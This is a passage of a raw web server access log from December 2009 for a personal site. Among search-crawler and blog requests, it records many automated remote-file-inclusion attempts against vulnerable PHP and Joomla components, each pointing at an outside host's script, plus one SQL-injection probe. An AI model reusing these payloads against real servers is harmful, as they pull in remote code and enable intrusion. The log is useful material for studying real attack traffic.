77.221.130.19 - - [14/Dec/2009:13:40:59 -0800] "GET /logs/access_080220.log/update9.php?lang=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:06 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:06 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:06 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:06 -0800] "GET /logs/access_080410.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:09 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:09 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:09 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:41:09 -0800] "GET /logs/access_080410.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:42:41 -0800] "GET /logs/access_080410.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:42:41 -0800] "GET /logs/access_080327.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:42:45 -0800] "GET /logs/access_080410.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:42:45 -0800] "GET /logs/access_080327.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.1.134.16 - - [14/Dec/2009:13:42:45 -0800] "GET /logs/access_090309+and+0=1+union+select+.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:42:47 -0800] "GET /logs/access_090806.log HTTP/1.0" 200 2696873 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:43:08 -0800] "GET /logs/access_080409.log HTTP/1.0" 200 1838031 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:43:14 -0800] "GET /logs/access_090323.log HTTP/1.0" 200 3501505 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.202.238 - - [14/Dec/2009:13:43:57 -0800] "GET /errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [14/Dec/2009:13:43:58 -0800] "GET /logs/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [14/Dec/2009:13:43:58 -0800] "GET /logs/access_090213.log/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:44:02 -0800] "GET /logs/access_081018.log HTTP/1.0" 200 3691485 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.202.238 - - [14/Dec/2009:13:44:11 -0800] "GET /logs/access_080906.log/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:44:13 -0800] "GET /logs/access_090312.log HTTP/1.0" 200 5058024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:13:44:55 -0800] "GET /logs/access_090213.log/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:13:44:55 -0800] "GET /errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:13:44:55 -0800] "GET /logs/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:13:45:21 -0800] "GET /logs/access_080906.log/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:45:34 -0800] "GET /logs/access_091209.log HTTP/1.0" 200 2525680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:13:46:44 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:13:46:44 -0800] "GET /logs/access_090930.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:13:46:44 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:13:46:44 -0800] "GET /logs/access_090508.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [14/Dec/2009:13:47:01 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:13:47:02 -0800] "GET /blog/ HTTP/1.0" 200 14729 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:13:47:05 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.0" 200 10083 "http://dmulk.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:13:47:07 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.0" 304 - "http://dmulk.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:13:47:10 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.0" 304 - "http://dmulk.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:47:37 -0800] "GET /logs/access_080707.log HTTP/1.0" 200 3078824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:01 -0800] "GET /logs/access_090624.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:01 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:01 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:01 -0800] "GET /logs/access_080410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:05 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:05 -0800] "GET /logs/access_080410.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:05 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:49:05 -0800] "GET /logs/access_090624.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.80.193.42 - - [14/Dec/2009:13:49:53 -0800] "GET / HTTP/1.0" 200 14847 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.0.3; SU 2.009; .NET CLR 1.1.4322)" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:06 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:06 -0800] "GET /logs/access_080910.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:06 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:06 -0800] "GET /logs/access_080410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:12 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:12 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:12 -0800] "GET /logs/access_080410.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:50:27 -0800] "GET /logs/access_090624.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:50:27 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:50:27 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:50:31 -0800] "GET /logs/access_080910.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:50:56 -0800] "GET /logs/access_090212.log HTTP/1.0" 200 3227275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:50:59 -0800] "GET /bikes/2k6klr650/?D=A HTTP/1.0" 200 1363 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:13:51:15 -0800] "GET /logs/access_090227.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:13:51:15 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:13:51:15 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:13:51:15 -0800] "GET /logs/access_090413.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:13:51:33 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:13:51:34 -0800] "GET /blog/index.php/2008/08/ HTTP/1.0" 200 11901 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:51:37 -0800] "GET /logs/access_091016.log HTTP/1.0" 200 2933286 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:51:55 -0800] "GET /logs/access_080910.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:51:55 -0800] "GET /logs/access_080410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:51:55 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:51:55 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:52:09 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:52:09 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:13:52:31 -0800] "GET /logs/access_080910.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:53:35 -0800] "GET /bikes/2k6klr650/?M=A HTTP/1.0" 200 1363 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:18 -0800] "GET /logs/access_080410.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:18 -0800] "GET /logs/access_090624.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:19 -0800] "GET /logs/access_090624.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:19 -0800] "GET /logs/access_080410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:54:19 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:55:01 -0800] "GET /bikes/dteel/2008_01_27/?N=D HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.202.238 - - [14/Dec/2009:13:55:42 -0800] "GET /logs/access_090213.log%20%20/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:55:44 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:55:44 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:55:44 -0800] "GET /logs/access_090624.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [14/Dec/2009:13:56:08 -0800] "GET /logs/access_080906.log%20%20/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:56:37 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:56:37 -0800] "GET /logs/access_080410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:56:37 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:13:56:37 -0800] "GET /logs/access_090624.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:13:57:12 -0800] "GET /logs/access_090227.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:13:57:15 -0800] "GET /logs/access_090413.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:13:57:17 -0800] "GET /logs/access_090213.log%20%20/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:13:57:21 -0800] "GET /logs/access_080906.log%20%20/errors.php?error=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:58:25 -0800] "GET /bikes/dteel/EQ2/Screenshots/?S=A HTTP/1.0" 200 5396 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:59:05 -0800] "GET /logs/access_090513.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:59:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:59:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 200 14945 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:59:15 -0800] "GET /logs/access_090513.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:59:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:59:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 200 14944 "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:59:45 -0800] "GET /appserv/main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:14:00:33 -0800] "GET /logs/access_080823.log HTTP/1.0" 200 3248945 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:14:00:57 -0800] "GET /logs/access_081224.log%20/args.php?arg=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:14:00:57 -0800] "GET /args.php?arg=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:14:00:57 -0800] "GET /logs/args.php?arg=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:14:01:02 -0800] "GET /logs/access_091007.log HTTP/1.0" 200 2778201 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:14:01:37 -0800] "GET /logs/access_091103.log HTTP/1.0" 200 3005161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:14:01:48 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:14:01:48 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:14:01:48 -0800] "GET /logs/access_080410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:14:01:48 -0800] "GET /logs/access_090624.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
38.101.148.126 - - [14/Dec/2009:14:02:04 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Moz